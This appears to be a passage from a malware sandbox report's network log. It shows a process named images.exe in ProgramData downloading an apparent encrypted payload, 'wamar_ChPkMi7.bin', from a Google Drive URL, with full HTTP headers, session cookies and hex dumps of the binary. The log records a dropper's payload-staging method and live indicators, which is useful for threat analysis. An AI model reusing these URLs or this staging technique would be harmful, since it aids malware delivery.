Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-01 18:26:21 UTC	160	IN	Data Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 37 34 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 73 6b 35 6e 66 62 36 61 37 31 62 73 69 34 6b 62 30 68 6f 69 39 33 74 38 75 62 63 34 35 37 6e 39 2f 67 61 35 75 Data Ascii: 198<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5u
2021-12-01 18:26:21 UTC	160	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49765	142.250.185.161	443	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:21 UTC	160	OUT	GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0c-74-docs.googleusercontent.com Connection: Keep-Alive
2021-12-01 18:26:22 UTC	161	IN	HTTP/1.1 302 Found X-GUploader-UploadID: ADPycdtBLuW6EDVawQw2afUlKnuxwC5UCB5DCZF6Bf2-mj-5H-tcv4oZM8s3tsLpD5WvdAZjSEbjoDgf68Q3muj3kr0Y2FtD8A Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info." Location: https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn Date: Wed, 01 Dec 2021 18:26:22 GMT Expires: Wed, 01 Dec 2021 18:26:22 GMT Cache-Control: private, max-age=0 Content-Length: 0 Server: UploadServer Set-Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0; Domain=doc-0c-74-docs.googleusercontent.com; Expires=Wed, 01-Dec-2021 18:36:22 GMT; Path=/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9; Secure; SameSite=none; HttpOnly Content-Type: text/html; charset=UTF-8 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49766	142.250.186.78	443	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:22 UTC	165	OUT	GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: docs.google.com Cookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
2021-12-01 18:26:22 UTC	166	IN	HTTP/1.1 302 Found Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:26:22 GMT Location: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 Strict-Transport-Security: max-age=31536000 Report-To: {"group":"DriveUntrustedContentSignerHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external"}]} Content-Security-Policy: script-src 'nonce-AERwCsKQpg3A8OF1lK5IjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentSignerHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentSignerHttp/cspreport Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentSignerHttp" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49767	142.250.185.161	443	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:22 UTC	167	OUT	GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: doc-0c-74-docs.googleusercontent.com Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0
2021-12-01 18:26:22 UTC	168	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduIam_2yeM-1omu88GOOFIKCe3wh_XC9aeVOIIw41zUIP3CIUPaulbP403-_DaMZPXsV8Nc-REQ70mLApeZBNAxBatZCQ Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info." Content-Type: application/octet-stream Content-Disposition: attachment;filename="wamar_ChPkMi7.bin";filename*=UTF-8''wamar_ChPkMi7.bin Content-Length: 156224 Date: Wed, 01 Dec 2021 18:26:22 GMT Expires: Wed, 01 Dec 2021 18:26:22 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=4R1wKw== Server: UploadServer Set-Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu=13277406679786744507Z\|1638383175000\|fbnbtom2qbkuqcm2hesnid1n96o0n4hm; Domain=.googleusercontent.com; Expires=Wed, 01-Dec-2021 18:31:22 GMT; Path=/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9; Secure; SameSite=none; HttpOnly Set-Cookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=; Domain=doc-0c-74-docs.googleusercontent.com; Expires=Tue, 30-Nov-2021 18:26:22 GMT; Path=/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9; Secure; SameSite=none; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-01 18:26:22 UTC	172	IN	Data Raw: a9 3e e5 01 df d0 81 1f 8e 73 0c 35 c6 77 5a 92 b3 87 c6 e9 89 b8 b4 3c 18 30 75 36 d3 91 4c 3a 41 80 b7 a3 cd 1f b7 c3 a2 94 5b 16 6b df d8 30 7d 04 25 47 ea 41 10 07 1b e2 07 23 e7 a8 a8 4a 46 ab c4 10 4c 1a 1a 21 96 55 fe e9 c3 7f cf eb 5b af 5f df af 8d e1 47 b7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3b 60 27 d4 32 98 b0 ff da f7 d8 4f 26 30 94 f5 39 fc 66 c1 87 81 5e a2 ba 46 9b b1 72 c0 8a e5 1c 9c 55 86 2c 0e c5 3e d0 5d 1f cc fb 58 b0 d5 83 9a c8 8f 37 9d 3a 37 86 5a cf 84 f0 de 3f 88 6e 2a 13 bb 57 e1 cc 5a cd a6 5c 1c b6 2d 06 b3 ea 14 f1 7b 85 95 8f 0f f4 37 74 f8 49 49 1b c8 96 02 d5 c5 6a 41 a9 07 1a ed 52 c4 a0 2e 06 2e 1c 56 17 c9 6a 06 fe 0b e0 3b 01 cc a2 6a a5 4f 80 6c Data Ascii: >s5wZ<0u6L:A[k0}%GA#JFL!U[_G()Xbcqd@aaE;`'2O&09f^FrU,>]X7:7Z?n*WZ\-{7tIIjAR..Vj;jOl
2021-12-01 18:26:22 UTC	176	IN	Data Raw: a0 1e 29 ee 2f 2e 96 36 57 90 14 be a9 e2 d3 38 98 58 8f b7 b2 e1 f0 1c 3b 88 ed c3 17 d1 3c 70 84 62 77 2d 49 33 9a 0f e2 74 8d d2 4b bd 62 ca e8 20 1c de 7a c9 22 32 38 0f 7a 7a 70 c1 02 dd 8a 83 f2 15 c1 65 8a 81 e6 e8 73 bf f7 c0 a6 97 e5 30 5a b0 14 e6 15 46 41 89 e7 aa 99 ea f3 10 af 76 8e 2f a5 d1 3d 13 07 6a 0c 55 d7 a3 dc 5b c3 b9 11 a9 90 2d 77 93 6e d1 52 77 09 33 a3 68 52 d1 c9 30 26 9b 4b 22 7c ec 5f 3f d8 79 c3 9f 7d b8 72 42 f4 c3 0c d1 73 c7 49 44 fe ea 0b cd e2 e5 bc bd f5 ea e6 48 3d 08 30 60 76 2a 80 79 a1 3f d2 35 8f 12 0f 80 9a 0e a3 f0 49 e9 4f 20 6b 73 c2 6a 8f c3 55 19 c4 46 f3 3c 55 5b 56 9c 6e 42 17 e5 0e c6 1f 37 90 48 31 b6 56 55 48 13 23 3b 8a 89 4d f2 f4 99 7e 33 0b b3 d7 9a c7 97 60 34 cd f8 21 e1 59 14 3f 6a d7 ef 00 c0 1f Data Ascii: )/.6W8X;<pbw-I3tKb z"28zzpes0ZFAv/=jU[-wnRw3hR0&K"\|_?y}rBsIDH=0`v*y?5IO ksjUF<U[VnB7H1VUH#;M~3`4!Y?j
2021-12-01 18:26:22 UTC	180	IN	Data Raw: a5 fc 01 b6 a0 35 2b 91 5d ff 67 0a 1a 6c ce b0 1d df 99 4a ae 8f ee a7 f0 92 2f 62 20 c6 42 c2 6a 8f 40 fb 5e 00 32 be 3c d4 4f fb 48 62 41 64 a6 a6 70 14 b4 b8 45 e2 01 ff 1f 25 2d 1e bc 64 de b3 f2 20 89 bb 18 73 7a 3b 1b a8 91 6f 34 46 a5 9f 48 c2 99 72 05 a6 64 a4 eb 56 10 94 18 2b 05 be d6 60 96 3b 7e 2f c1 5d cb f4 8c 33 f7 af 99 e6 77 da 92 3b 1a 3c 84 da 46 f0 28 40 c4 37 19 46 10 db b5 2e 5b 26 a3 15 a0 51 f6 02 1b aa 53 2d 09 84 b2 24 05 1c 75 51 49 13 37 e9 33 80 2c 9a e7 5b 21 52 49 e1 e2 e8 f9 78 b1 8d a3 40 fa 2a a2 58 ee 78 16 d8 c5 dd 7d 0b f7 32 bb 9b fd f1 d3 26 1b f9 41 d8 a7 0c 62 37 76 25 15 95 6f c2 0c eb 2e 2d 45 f6 7a 84 d7 df 1f c3 20 82 16 97 50 08 75 9d 28 44 f7 5d 95 41 11 c7 25 88 c0 69 58 db 35 62 46 8c 1f 23 b5 8c 61 26 67 Data Ascii: 5+]glJ/b Bj@^2<OHbAdpE%-d sz;o4FHrdV+`;~/]3w;<F(@7F.[&QS-$uQI73,[!RIx@*Xx}2&Ab7v%o.-Ez Pu(D]A%iX5bF#a&g
2021-12-01 18:26:22 UTC	183	IN	Data Raw: ad bd b1 64 d4 3e 1b 90 33 b9 ed 6f 1d 01 35 10 db bf cb 55 0f 21 6f 05 20 26 fb 74 2f 70 84 10 6c 5e 50 65 ac d2 1d 2a cf d6 11 7f a1 cb 43 be 59 37 13 f7 d1 24 54 f8 85 fd f6 c0 a1 6b 0c c2 7d 2c 35 45 86 43 61 89 e0 56 30 eb 44 68 dd ce 3c 4c a4 0e 81 a2 40 b9 1b 2d c7 a3 36 d3 af 76 a6 20 a5 d1 75 87 4e 82 87 46 54 d9 34 0a e0 30 50 26 0b b1 b1 97 a9 17 6b 20 30 72 28 22 50 46 46 dc fb 55 b2 9c 87 38 d2 72 5b 34 8d a2 4b 3b e6 cd ed 6c 67 f7 73 9e 92 0f ee 2c e7 88 4e 91 b2 de 3a c5 0e 97 92 ce 6e fc 2f e8 d2 f2 97 d6 f0 6a ce 12 0f 87 47 ad a3 f0 dc 34 35 39 f1 5c 82 1d 45 05 80 95 c4 ae 19 93 a4 b3 13 d0 6a 42 c2 e0 05 8f f7 61 dc b8 e4 8b 1f 05 4e 9c e5 f8 8c 9f b1 42 7f 3f 80 20 d9 0e 5c d7 4c 19 fa 10 46 f6 42 05 45 49 fd ed f1 28 5f 4b 3e b1 94 Data Ascii: d>3o5U!o &t/pl^Pe*CY7$Tk},5ECaV0Dh<L@-6v uNFT40P&k 0r("PFFU8r[4K;lgs,N:n/jG459\EjBaNB? \LFBEI(_K>
2021-12-01 18:26:22 UTC	185	IN	Data Raw: 59 ba 85 f8 2b 7b 91 ca 53 9d b5 8c f1 e5 55 48 ad 67 c9 28 22 6e 62 24 25 26 a8 3c ba 91 c4 68 ba 34 f0 a1 04 72 88 ff c1 04 c1 8c 5b 6a 2c e9 14 a4 35 c9 6e 2e be 0f c3 69 d3 b3 98 2a 0d fc c0 e0 56 d3 df c3 c0 dc 99 28 80 c7 e3 29 c8 6e 23 56 2f fa e2 e2 01 5f fa 14 c5 b6 bb ca 5f d8 f2 2f 6c a3 ba f6 a9 19 09 99 2b 7a 66 e6 4f c1 84 c5 51 60 bb 58 1d a1 29 84 7b 2f e7 fa aa d0 cf 7c a9 76 df 05 dd 9b b9 55 d2 dc 5b 48 43 07 5b 8a 24 f8 06 25 55 94 bc cf 07 af 6f d3 ac 8f 9a 42 99 60 33 e2 c0 eb 68 cf 08 56 34 31 3d 40 32 d0 49 60 22 ab 61 e2 75 56 b2 7f 95 b6 ad 6d f1 d3 bc 21 98 cf c2 0c 97 98 aa 1d 20 96 51 44 d0 c2 a4 3d 18 34 50 5d be 9d f8 25 af 63 5d 44 c2 f0 f8 19 c1 f4 0a 8a bb 18 7a fd 63 34 f4 5f fa 6a af 8d af bd 9a f0 3a 05 6f 68 5c 61 c1 Data Ascii: Y+{SUHg("nb$%&<h4r[j,5n.i*V()n#V/__/l+zfOQ`X){/\|vU[HC[$%UoB`3hV41=@2I`"auVm! QD=4P]%c]Dzc4_j:oh\a
2021-12-01 18:26:22 UTC	186	IN	Data Raw: 35 a9 f2 b8 93 38 a5 bb 34 78 88 ee 47 0c 7c 45 2d 3a e5 40 27 74 ba 09 9a e0 b9 47 af 12 57 99 1c a5 46 bb 0e a5 8d 5c 6e df 37 dd cf 00 1c 45 ba 04 21 00 cc ac 40 16 11 5d 90 cc d1 1e 2b 9e b1 48 b0 ce f0 33 d7 7a c5 39 22 69 41 9f 6b 14 b7 49 43 22 86 62 c2 5f 00 af 28 3b 58 87 4d da 1d 4f 29 fa 32 1b 62 e8 43 c7 9d c4 52 7c 44 0b 50 8e 42 20 7e d0 b5 c1 5e 79 94 63 dc 63 c4 92 71 53 c0 2f c2 9e 13 cb 8c 22 6a 01 33 90 88 8e 5a 37 d3 76 7c 99 9e 83 f7 54 4c 07 f6 21 bd d5 eb c0 62 bc e7 db ca 3d f6 c5 f0 43 9d b1 c1 0d 8e 65 23 85 d5 5c 9e 7f ed 35 bf a9 e5 f5 70 af a6 49 c5 29 ab ff c7 a3 f3 9e c1 79 28 96 b9 53 19 d0 a4 8e 78 df a9 41 b2 ad 7e 67 a0 6c 87 81 8d 04 51 38 61 8a 0c d4 46 f9 cf a3 d0 64 b7 5d 18 9a e6 cd 0e 91 ca 78 4f 31 6f 34 1a 7d b8 Data Ascii: 584xG\|E-:@'tGWF\n7E!@]+H3z9"iAkIC"b_(;XMO)2bCR\|DPB ~^yccqS/"j3Z7v\|TL!b=Ce#\5pI)y(SxA~glQ8aFd]xO1o4}
2021-12-01 18:26:22 UTC	187	IN	Data Raw: 2b 01 68 55 eb b1 fc b4 63 e0 c6 7a 91 55 5e c7 88 d9 17 36 81 7c 34 e0 c6 63 1f c4 79 3a cb 6c 58 97 f9 27 ad b3 3b 82 2b ac 20 67 37 22 17 1f cc d6 8d b9 5a 94 14 ef 84 11 7b 6f 25 41 92 21 32 c8 ee 0f 14 9c 15 17 0a 86 d2 74 7a 67 eb 07 87 e8 c4 c0 de f0 21 22 bc ba a3 1f 5b fa 71 ca 25 6f da cb df 06 2c c4 49 1e 34 85 4f 37 25 8b de 48 fb 9f b1 62 35 45 13 4c 14 2f f4 9b 4c 53 86 04 e7 23 9e 75 69 8b fa f8 fe 20 1e 42 64 65 3e ed 9d 71 7e 4d ea e0 89 03 ff 2f f9 cc 71 05 80 61 7d 21 66 76 52 ac fe 46 eb e6 e4 3b 6f c3 fd 43 df c4 ae a7 7e 5e 09 fa d1 09 d4 aa af 3b 1f 78 12 0c c6 5c 02 7f 7b 6e 2d 16 c3 d5 44 07 b5 f8 d4 26 22 c8 e9 17 7a e4 e7 43 9d 48 e5 84 ee e7 07 2a 1f e2 1d d8 25 5b d9 48 eb 24 fd e6 09 ea 61 02 c9 a7 ee ec 24 c1 e7 ad 17 d6 9f Data Ascii: +hUczU^6\|4cy:lX';+ g7"Z{o%A!2tzg!"[q%o,I4O7%Hb5EL/LS#ui Bde>q~M/qa}!fvRF;oC~^;x\{n-D&"zCH*%[H$a$
2021-12-01 18:26:22 UTC	189	IN	Data Raw: f6 ba d6 f2 50 9f 33 f5 8e 1d 01 c0 c4 cc a7 a6 92 f3 5a c9 36 5a 2a 4b dd fa f4 30 b7 ae 1b 6c 5b 4c 7b c7 ed aa a4 57 0f 4c 98 df 56 3d 39 86 94 bd c2 a6 a2 bc 62 d9 b2 32 37 54 9a da 52 ec 54 72 40 85 63 7c c5 1e c8 b6 51 9f e9 01 57 32 a1 fc a2 b1 1f ce 4e 67 99 c1 79 a3 03 28 ca 54 b8 ca f4 01 5e d4 86 99 e6 af 05 49 fc dd 2b a4 a8 ef 12 da 15 30 55 71 5a a9 8e e6 2f 4f cf c0 f6 4e 12 2e 76 b1 b5 d3 36 7c 44 3e 88 15 1c 9d b0 59 65 bd 48 50 70 a4 55 8d d1 ab ae 94 ae 03 3e f7 8f c4 f6 da 1c f0 2a a2 58 8d 9d 9b cf 61 19 28 80 f3 2c b7 8f ae f7 7b d8 1a 6f 4d 50 cd 64 14 77 76 cd 50 10 d8 26 5c 60 e2 48 e3 e4 f1 4a 6f 8f e4 cd 20 d2 01 b1 b6 85 30 35 91 86 47 d6 5b f9 70 c7 24 88 4b f0 e1 e5 1f 75 44 e3 50 27 d0 53 d0 ce 4b 9b 1e 5c ca e8 c4 b3 92 20 Data Ascii: P3Z6ZK0l[L{WLV=9b27TRTr@c\|QW2Ngy(T^I+0UqZ/ON.v6\|D>YeHPpU>Xa(,{oMPdwvP&\`HJo 05G[p$KuDP'SK\
2021-12-01 18:26:22 UTC	190	IN	Data Raw: ff a5 45 30 fe 87 b0 28 1f 2e a5 9c a0 25 34 5d ce 97 d4 b6 6e bb 92 19 4b b0 c8 b3 5f 05 60 a7 0e 9e 45 d6 2d 23 67 30 48 33 40 71 92 1a 56 96 92 2d f6 06 96 a0 cd e1 36 19 ac ec 89 7a 83 95 b2 6d 2a cc cc e6 75 5a 30 d5 58 a9 67 4e 81 60 c1 91 5d 40 25 5c c5 9f 9c ab 47 34 37 b3 99 1f 8c f7 ad f6 c9 9a 74 1f 58 52 9f cc f7 8c 67 0e 1a dd 67 96 b5 89 a8 3c 6b 1a 81 e7 f6 b7 e3 a3 8d e1 cc 07 2e 15 8b 1e b7 9c c5 ee c8 af 6e 97 5c 96 74 bf d7 96 58 08 67 ac 68 9d a3 71 64 cb 10 67 97 6e 51 35 44 83 3a a7 21 62 5a 63 be 16 17 ff 15 6e f4 21 81 d0 1a a4 0e a8 71 61 5a 5d 5e e9 01 fd f4 1f 16 0f 82 19 be 71 e4 5c d4 57 ea ab 99 ed e6 10 13 79 c8 c6 6d b4 59 f9 5f 73 83 0e 2d 77 fb de 3f 03 9e af e5 37 5e b5 7a 9d 21 61 be cb f2 6c e2 9d 85 e8 ea 80 0c ce 32 Data Ascii: E0(.%4]nK_`E-#g0H3@qV-6zm*uZ0XgN`]@%\G47tXRgg<k.n\tXghqdgnQ5D:!bZcn!qaZ]^q\WymY_s-w?7^z!al2
